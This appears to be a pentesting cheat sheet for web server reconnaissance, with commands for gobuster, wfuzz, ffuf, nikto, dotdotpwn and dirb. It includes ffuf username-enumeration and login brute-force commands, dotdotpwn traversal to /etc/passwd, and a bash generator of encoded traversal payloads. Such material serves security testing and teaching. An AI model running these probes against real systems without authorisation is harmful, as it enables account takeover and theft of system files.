Webserver scanning

Common wordlists

General
  • /usr/share/seclists/Discovery/Web-Content/common.txt
  • /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
CGI
  • /usr/share/seclists/Discovery/Web-Content/CGIs.txt
SharePoint
  • /usr/share/wordlists/SecLists/Discovery/Web_Content/sharepoint.txt

Wordlist paths differ between SecLists releases and distribution packages (the Web_Content directory was later renamed Web-Content, and the package may live under /usr/share/seclists or /usr/share/wordlists/SecLists), so confirm the file exists before starting a long scan, e.g. find /usr/share -name sharepoint.txt.

gobuster

GitHub - OJ/gobuster - Directory/File, DNS and VHost busting tool written in Go
gobuster dir -u <host> -w /usr/share/seclists/Discovery/Web-Content/common.txt -s '200,204,301,302,307,403,500' -b '' -e -o gobuster -t 50
-s is the list of status codes to report and -b '' clears the default 404 blacklist; since gobuster 3.1 passing -s without clearing -b is rejected because the two options conflict. -e prints full URLs instead of paths, -o writes the results to a file, -t sets the number of concurrent requests. Including 403 and 500 in -s helps spot protected or broken paths but produces noise behind a WAF or a catch-all page; compare the reported sizes to tell a real hit from a boilerplate response.

File extensions

IIS
-x asp,aspx,html,txt
Apache / nginx
-x php,cgi,jsp,html,txt
Pick the list from the Server header or the Wappalyzer fingerprint rather than guessing: every extension adds one more request per wordlist entry, and jsp only matters when a servlet container such as Tomcat sits behind the proxy.
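Triage of a gobuster results file, as an added example that is not part of the original page or of gobuster itself. It assumes the gobuster v3 line format "/path (Status: NNN) [Size: N] [--> redirect]" (with -e the first field is a full URL, which works the same way) and uses a constructed sample file in place of a real scan.

```bash
#!/usr/bin/env bash
# Added example (not from the page or from gobuster): triage a gobuster v3
# results file written with -o. Assumes the v3 line format
#   /path   (Status: NNN) [Size: N] [--> redirect]
# (with -e the first field is a full URL instead of a path, which also works).
set -u

# Constructed sample of a gobuster results file. Three 403s with an identical
# body size are the typical signature of a WAF or catch-all "forbidden" page.
SAMPLE="$(mktemp)"
cat > "$SAMPLE" <<'EOF'
/admin                (Status: 301) [Size: 313] [--> http://10.0.0.5/admin/]
/backup               (Status: 403) [Size: 1234]
/cgi-bin/             (Status: 403) [Size: 1234]
/images               (Status: 301) [Size: 314] [--> http://10.0.0.5/images/]
/index.html           (Status: 200) [Size: 10701]
/old                  (Status: 403) [Size: 1234]
/robots.txt           (Status: 200) [Size: 43]
EOF

# Most frequent body size in the file. On a server that answers every unknown
# path with the same page, this is the size of that page (the "noise" size).
gobuster_noise_size() {
    grep -o 'Size: [0-9]*' "$1" | awk '{print $2}' | sort | uniq -c | sort -rn | awk 'NR==1 {print $2}'
}

# Print "status size path" for every hit, dropping hits whose body size equals
# the optional noise size, sorted and de-duplicated.
gobuster_triage() {
    local file="$1" noise="${2:-}"
    awk -v noise="$noise" '
        /\(Status: [0-9]+\)/ {
            path = $1
            match($0, /Status: [0-9]+/); status = substr($0, RSTART + 8, RLENGTH - 8)
            match($0, /Size: [0-9]+/);   size   = substr($0, RSTART + 6, RLENGTH - 6)
            if (noise != "" && size == noise) next
            print status, size, path
        }' "$file" | sort -u
}

# Usage: find the noise size, then list what is left after removing it.
NOISE="$(gobuster_noise_size "$SAMPLE")"
echo "noise size: $NOISE"          # prints 1234 for the sample
gobuster_triage "$SAMPLE" "$NOISE" # four real hits remain
```

The same size check is what you would apply by hand to a results file full of 403s: if the WAF or error page is always the same size, one filter removes it and the remaining entries are worth a manual look.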

wfuzz

GitHub - xmendez/wfuzz - Web application fuzzer
wfuzz -w <wordlist-file> -w <wordlist-file2> --hc 404 <host>/FUZZ/FUZ2Z
Each -w supplies one payload in order: the first fills FUZZ, the second FUZ2Z, so a URL with two markers needs two wordlists (all combinations are tried by default). --hc 404 hides responses with that status code.
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt --sh BBB '<host>/file.php?param=FUZZ{notfound}'
BBB stands for the baseline request, which wfuzz builds from the value in braces after the marker (notfound is a placeholder; use a value the parameter is expected to reject). --sh BBB shows only responses whose character count equals the baseline's; --hh BBB is the inverse and is the usual choice when looking for values that change the page. -c colours the output.

ffuf

GitHub - ffuf/ffuf - Fast web fuzzer written in Go
Enumerate usernames
ffuf -w <wordlist-file> -X POST -d "email=FUZZ&password=x" -H "Content-Type: application/x-www-form-urlencoded" -u <url> -mr "email already exists"
-mr keeps only responses whose body matches the regex, so the string must be the exact message the application returns for a taken address; send one request by hand first to capture it.
Brute force passwords
ffuf -w emails.txt:W1,<password-file>:W2 -X POST -d "email=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u <url> -fc 200
With two keyworded wordlists ffuf defaults to clusterbomb mode (every email against every password), so the request count is the product of both list sizes. -fc 200 assumes a failed login answers 200 and a success does something else, such as a redirect; confirm that with a known-bad pair before trusting the filter, and watch for lockouts and rate limiting.

nikto

GitHub - sullo/nikto - Web server scanner
nikto -h <ip> -Format txt -o .
-o . lets nikto choose the output file name itself; -Format sets the report type (txt, csv, htm, xml). Nikto is noisy and slow behind a WAF, so run it after the WAF check below.

dotdotpwn

GitHub - wireghoul/dotdotpwn - The Directory Traversal Fuzzer
dotdotpwn -m http -h <ip> -f <file>
dotdotpwn -m http-url -u 'http://<ip>/nav.php?page=TRAVERSAL' -o unix -s -d 4 -k "root:" -f /etc/passwd
-m selects the module (http fuzzes the request path, http-url replaces the TRAVERSAL marker inside the given URL), -f is the file to reach, -o the target OS (which selects the path style), -d the maximum number of ../ levels, -k the string that must appear in the response for a hit and -s enables banner grabbing for service detection. Quote the URL so the shell does not interpret the ?.
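To make the -d and -k options concrete, the following is an added example (not part of the original page and not dotdotpwn's own code) that generates the traversal payloads a fuzzer sends for a given depth and checks a response body for the success pattern. The set of encodings is this example's own choice; the /etc/passwd line used as a response is constructed.

```bash
#!/usr/bin/env bash
# Added example (not from the page or from dotdotpwn): generate the traversal
# payloads a fuzzer sends for a given depth and check a response for the
# pattern that marks a successful read. The encoding set below is this
# example's own choice, not dotdotpwn's list.
set -u

# traversal_payloads DEPTH FILE: one payload per line for every encoding at
# every depth from 1 to DEPTH. FILE is given without a leading slash.
# Each encoding is one way of writing "go up one directory": plain, with
# URL-encoded slashes or dots, with backslashes for Windows targets, and
# "....//", which survives a filter that strips "../" exactly once.
traversal_payloads() {
    tp_depth="$1"; tp_file="$2"
    tp_d=1
    while [ "$tp_d" -le "$tp_depth" ]; do
        for tp_enc in '../' '..%2f' '%2e%2e/' '%2e%2e%2f' '..\' '..%5c' '....//'; do
            tp_prefix=""; tp_i=0
            while [ "$tp_i" -lt "$tp_d" ]; do
                tp_prefix="$tp_prefix$tp_enc"
                tp_i=$((tp_i + 1))
            done
            printf '%s%s\n' "$tp_prefix" "$tp_file"
        done
        tp_d=$((tp_d + 1))
    done
}

# traversal_hit PATTERN: read a response body on stdin and succeed only if the
# success pattern (dotdotpwn's -k, e.g. "root:") appears in it.
traversal_hit() {
    grep -q -- "$1"
}

# Usage: the payload count is encodings x depth, so a large -d against a slow
# target is costly; start at the depth of the page's own path and grow from there.
traversal_payloads 4 etc/passwd | wc -l     # prints 28
traversal_payloads 2 etc/passwd
# Constructed /etc/passwd fragment standing in for a response body.
printf 'root:x:0:0:root:/root:/bin/bash\n' | traversal_hit 'root:' && echo "hit"
```

A fuzzer that only tries the plain ../ form misses the encoded and double-stripping variants, which is why the tool's depth and encoding options matter more than the wordlist here.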

dirb

DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the response.
dirb <host> -o dirb
Without a wordlist argument dirb uses its bundled /usr/share/dirb/wordlists/common.txt; pass another list as the second positional argument. -o writes the results to a file.

DirBuster

DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers.
dirbuster
Starts the Java GUI; the directory-list-2.3-medium.txt file listed above is the list it ships with.

Web application firewall (WAF) detection

You can use wafw00f to detect web application firewalls (WAFs).
wafw00f <url>
Run this before the scanners above: a WAF turns many probes into identical 403 or block pages, which explains a results file full of same-sized hits and argues for lower thread counts and a smaller wordlist. -a keeps testing after the first match so that every WAF fingerprint found is reported.

wappalyzer (firefox add-on)

Identifies the technology stack (server, language, framework, CMS) from response headers, cookies and page content; use its result to choose the file extensions and wordlists above.